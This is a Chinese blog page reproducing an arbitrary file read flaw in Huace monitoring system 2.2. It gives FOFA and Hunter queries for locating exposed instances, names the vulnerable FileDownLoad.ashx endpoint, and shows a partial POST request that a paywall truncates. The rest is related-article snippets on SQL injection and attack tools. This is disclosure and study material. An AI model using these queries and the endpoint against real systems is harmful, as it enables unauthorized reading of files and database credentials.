华测监测预警系统 2.2---任意文件读取漏洞

最新推荐文章于 2025-03-30 20:48:08 发布
原创 最新推荐文章于 2025-03-30 20:48:08 发布 · 490 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #网络 #前端 #数据库

本文详细介绍了华测监测预警系统2.2的任意文件读取漏洞,包括资产搜集、漏洞复现和实战总结。通过使用fofa和hunter进行资产搜集,利用 Hunter 语法定位到目标系统。在漏洞复现中,揭示了/Handler/FileDownLoad.ashx的路径,通过修改POST参数实现文件下载,可能导致数据库凭证泄露。实战总结中,利用备案信息提交漏洞报告,成功处理安全问题。

目录

1. 资产搜集

2. 漏洞复现

3. 实战总结

1. 资产搜集

直接上fofa 和 hunter
个人推荐hunter可以看到icp备案公司直接提交盒子就行了

FOFA语法 app=”华测监测预警系统2.2”

Hunter语法 web.body=”华测监测预警系统2.2”

图片

2. 漏洞复现

这里手动复现的,目录是/Handler/FileDownLoad.ashx
通过hackerbar 可以修改POST传参,或者利用BP构造请求包。

 

     
 
  1.  
    POST /Handler/FileDownLoad.ashx HTTP/1.1
     
    2.  
 
  2.  
    Host: ip:port
     
    3.  
 
  3.  
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
     
    4.  
 
  4.  
    Accept-Encoding: gzip, deflate
     
    5.  
 
  5.  
    Accept: */*
     
    6.  
 
  6.  
    Connection: close
     
    7.  


                

        

    


  


        

            

                      
                        最低0.47元/天 解锁文章
                          
                      
            

        


    



                



	

		

			

				
					
监测预警系统 2.2 存在任意文件读取漏洞

				
			

			

				

					holyxp的博客
				

				

					10-10
					
					1380
					
				

			

		

		

			
				
监测预警系统是一套科学完善的地质灾害监测预警平台,实现了地质灾害防治管理的科学化、信息化、标准化和可视化。

			
		

	



                

            
              



	

		

			

				
					
监测预警系统2.2 UserEdit.aspx SQL注入致RCE漏洞复现(CVE-2023-5827)

				
			

			

				

					0xSec
				

				

					06-20
					
					864
					
				

			

		

		

			
				
监测预警系统2.2 UserEdit.aspx 接口处存在SQL注入漏洞,未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。

			
		

	



              


  
              

                


	

		

			

				
					
漏洞复现】监测预警系统2.2 UserEdit.aspx SQL注入

				
			

			

				

					weixin_54799594的博客
				

				

					07-12
					
					1519
					
				

			

		

		

			
				
漏洞复现过程记录

			
		

	





	

		

			

				
					
某站点监测预警系统2.2版本-sql注入漏洞复现

				
			

			

				

					qq_35075142的博客
				

				

					03-16
					
					812
					
				

			

		

		

			
				
作为国内唯一一家集北斗卫星应用产品研发、生产和销售为一体的单位,监测预警系统能够提供准确的监测结果和及时的预警信息,帮助用户避免设备故障、事故以及其他不良事件的发生,降低潜在风险和损失。本人严格遵守我国法律法规,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请诸君严格遵守法律要求.本文简要讲述简单的渗透试以及相关sql注入漏洞的复现试,仅用作学习研究。尝试通过shell写入试命令whoami,ipconfig,如下图3所示。(1)漏洞影响:监测预警系统2.2

			
		

	



		

			
		



	

		

			

				
					
监测预警系统FileDownLoad.ashx存在任意文件读取漏洞

					
最新发布

				
			

			

				

					muxixin的博客
				

				

					03-30
					
					306
					
				

			

		

		

			
				
4.定期审计和试:定期进行代码审计和安全试,使用工具如OWASP ZAP、Nuclei等来检潜在的安全漏洞监测预警系统FileDownLoad.ashx存在任意文件读取漏洞,通过读取配置文件获取重要数据。1.使用安全的库函数:使用服务器或框架提供的函数来处理文件路径,例如在ASP.NET中可以使用。2.最小权限原则:确保运行该服务的账户具有最小的权限需求,避免使用高权限账户运行Web服务。3.安全头设置:确保Web服务器配置了适当的安全头,如。app="监测预警系统2.2"

			
		

	





	

		

			

				
					
监测预警系统 2.2 任意文件读取漏洞复现 [附POC]

				
			

			

				

					薛定谔嘚喵博客
				

				

					10-11
					
					541
					
				

			

		

		

			
				
监测预警系统是一套科学完善的地质灾害监测预警平台,实现了地质灾害防治管理的科学化、信息化、标准化和可视化。
监测预警系统 2.2 存在任意文件读取漏洞,通过该漏洞可以读取敏感信息文件。

			
		

	





	

		

			

				
					
漏洞复现】监测预警系统-FileDownLoad-文件读取

				
			

			

				

					知黑而守白
				

				

					01-11
					
					314
					
				

			

		

		

			
				
监测预警系统 FileDownLoad 接口存在文件上传漏洞。攻击者可以通过发送特定的POST请求,利用该漏洞获取系统敏感文件。监测预警系统是一套科学完善的地质灾害监测预警平台,实现了地质灾害防治管理的科学化、信息化、标准化和可视化。

			
		

	





	

		

			

				
					
漏洞复现--监测预警系统2.2任意文件读取

				
			

			

				

					qq_53003652的博客
				

				

					10-15
					
					480
					
				

			

		

		

			
				
监测集成事业部充分利用在地质灾害监测方面的技术积累,建立了一套科学完善的地质灾害监测预警平台,实现了地质灾害防治管理的科学化、信息化、标准化和可视化。该产品2.2版本FileDownLoad.ashx存在任意文件读取漏洞。此漏洞来自掌控安全学院。监测预警系统2.2

			
		

	





	

		

			

				
					
漏洞复现】监测预警系统——UserEdit——SQL注入

				
			

			

				

					LongL_GuYu的博客
				

				

					06-25
					
					784
					
				

			

		

		

			
				
监测预警系统2.2版,其`UserEdit`接口SQL注入漏洞。恶意攻击者可能会向数据库发送构造的恶意SQL查询语句,以获取数据库敏感信息、修改数据或者执行其他恶意操作,还有可能直接通过sql注入获取服务器权限。

			
		

	





	

		

			

				
					
监测预警系统2.2任意文件读取

				
			

			

				

					weixin_68647219的博客
				

				

					11-08
					
					273
					
				

			

		

		

			
				
监测集成事业部充分利用在地质灾害监测方面的技术积累,建立了一套科学完善的地质灾害监测预警平台,实现了地质灾害防治管理的科学化、信息化、标准化和可视化。该产品2.2版本FileDownLoad.ashx存在任意文件读取漏洞2.资产绘title="监测预警系统2.2"

			
		

	





	

		

			

				
					
用一般处理程序实现文件的下载(FileDownload.ashx)_谦虚的小法_新浪博客

				
			

			

				

					qq_30603679的博客
				

				

					05-28
					
					279
					
				

			

		

		

			
				
有些文件下载可以放在超链接里(*.zip ……),有些就不行(*.jpg、*.txt、*.pdf
……)浏览器会直接打开文件

用一般处理程序可以规范下载



							
		...

			
		

	





	

		

			

				
					
#渗透试#批量漏洞挖掘#监测预警系统2.2 UserEdit.aspx SQL注入(CVE-2022-24876)

				
			

			

				

					soc的博客
				

				

					02-25
					
					633
					
				

			

		

		

			
				
监测预警系统2.2(HuaCe Monitoring and Early Warning System 2.2)是一款由公司开发的监测预警软件。该系统主要用于收集、处理和分析各种监测数据,以及提供实时预警功能,帮助用户及时发现潜在的风险和问题。但其UserEdit接口存在SQL注入漏洞,恶意攻击者可能会向数据库发送构造的恶意SQL查询语句,以获取数据库敏感信息、修改数据或者执行其他恶意操作,还有可能直接通过sql注入获取服务器权限。

			
		

	





	

		

			

				
					
SRC实战 | EDU通用漏洞分享

				
			

			

				

					2301_80127209的博客
				

				

					01-17
					
					984
					
				

			

		

		

			
				
这两个通用漏洞,也是通过注册账号后才发现的。可以肯定的是,这些网站有了账号之后才能发现更多的功能点,功能点多了,漏洞就会有了。所以多去找点账号,或者这种能注册的站进去之后再试。可能会有更多收获。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径。

			
		

	





	

		

			

				
					
MSF的使用教程

					
热门推荐

				
			

			

				

					hackzkaq的博客
				

				

					10-18
					
					3万+
					
				

			

		

		

			
				
公众号:白帽子左一

MSF简介
Metasploit(MSF)是一个免费的、可下载的框架
它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。
当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。
因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。
也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所.

			
		

	





	

		

			

				
					
CS(Cobaltstrike)免杀和使用(附脚本)

				
			

			

				

					hackzkaq的博客
				

				

					07-23
					
					1万+
					
				

			

		

		

			
				
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一


作者:掌控安全-hpb1分享!

一.Cobaltstrike简介
作为一款协同APT工具,功能十分强大,针对内网的渗透试和作为apt的控制终端功能,使其变成众多APT组织的首选
fireeye多次分析过实用cobaltstrike进行apt的案例。
Cobaltstrike安装
CS需要一个服务器来进行,我们把它放到服务器上。
然后运行./teaserver ip 密码即可。

然后使用CS客户端连接即可,输入对应ip、端口和密码。


			
		

	





	

		

			

				
					
SQL注入知识总结

				
			

			

				

					hackzkaq的博客
				

				

					01-20
					
					1万+
					
				

			

		

		

			
				
更多黑客技能 公众号:暗网黑客
作者:掌控安全-veek

SQL注入基础
SQL注入(英语:SQL injection),是发生于应用程序与数据库层的安全漏洞。
简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。
OWASP Top10虽然常年有更改,但sql注入基本一直位于榜首,其优势在于极低的使用代价以及极高的危害性,地位可见一斑。
SQL注入的危害自然是很大的,通常有以.

			
		

	





	

		

			

				
					
Qual+Android方案Unlock学习 以Oneplus7Pro为例

				
			

			

				

					hackzkaq的博客
				

				

					10-12
					
					1万+
					
				

			

		

		

			
				
方法2是我最开始尝试的办法,但是dump了几次,发现了好几个ELF,但是都不对,所以尝试方法1 :D 很显然这个包是厂商自己搞得加密,不过网上已经有大佬分析了(早用方法1就少走弯路了),所以根据 How to Extract/Decrypt OnePlus OPS Firmware(https://www.droidwin.com/how-to-extract-oneplus-ops-firmware/) 提供的工具,可以成功吧固件包解开,获取到firehose。

			
		

	





	

		

			

				
					
CTF | CTF比赛题解分享

				
			

			

				

					hackzkaq的博客
				

				

					10-09
					
					9421
					
				

			

		

		

			
				
前言:由于此次比赛的题目较多,所以这是这个比赛的第一篇wp,共20题,先记录一下,防止忘记。里面有些题目是新手题较为简单,但也有许多有意思的题目,真的是做的过程痛不欲生,做完才感觉到酣畅淋漓,废话不多说,开写。接下来就可以定位了。1.这次显示文件是个jpg格式的图片,但是打不开,16进制编辑器打开,看到文件头出现了IHDR头,就可以想到其实是个png格式的图片,再看到文件尾,更加证实了是个png文件。4.第三张照片是最头疼的,全都是高楼,能够看到的只有广西农信,时代丽都,搜索相关位置,找到了大概区域。

			
		

	





	

		

			

				
					
自动化大坝位移监测系统设计

				
			

			

				

					
				

			

		

		

			
				
自动化监测方案样本是由上海导航技术股份有限公司提供的,该文档主要介绍了公司在大坝表面位移自动化监测系统设计方面的专业知识和技术优势。公司专注于GNSS核心技术的研发,旨在成为行业的领导者和创新...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值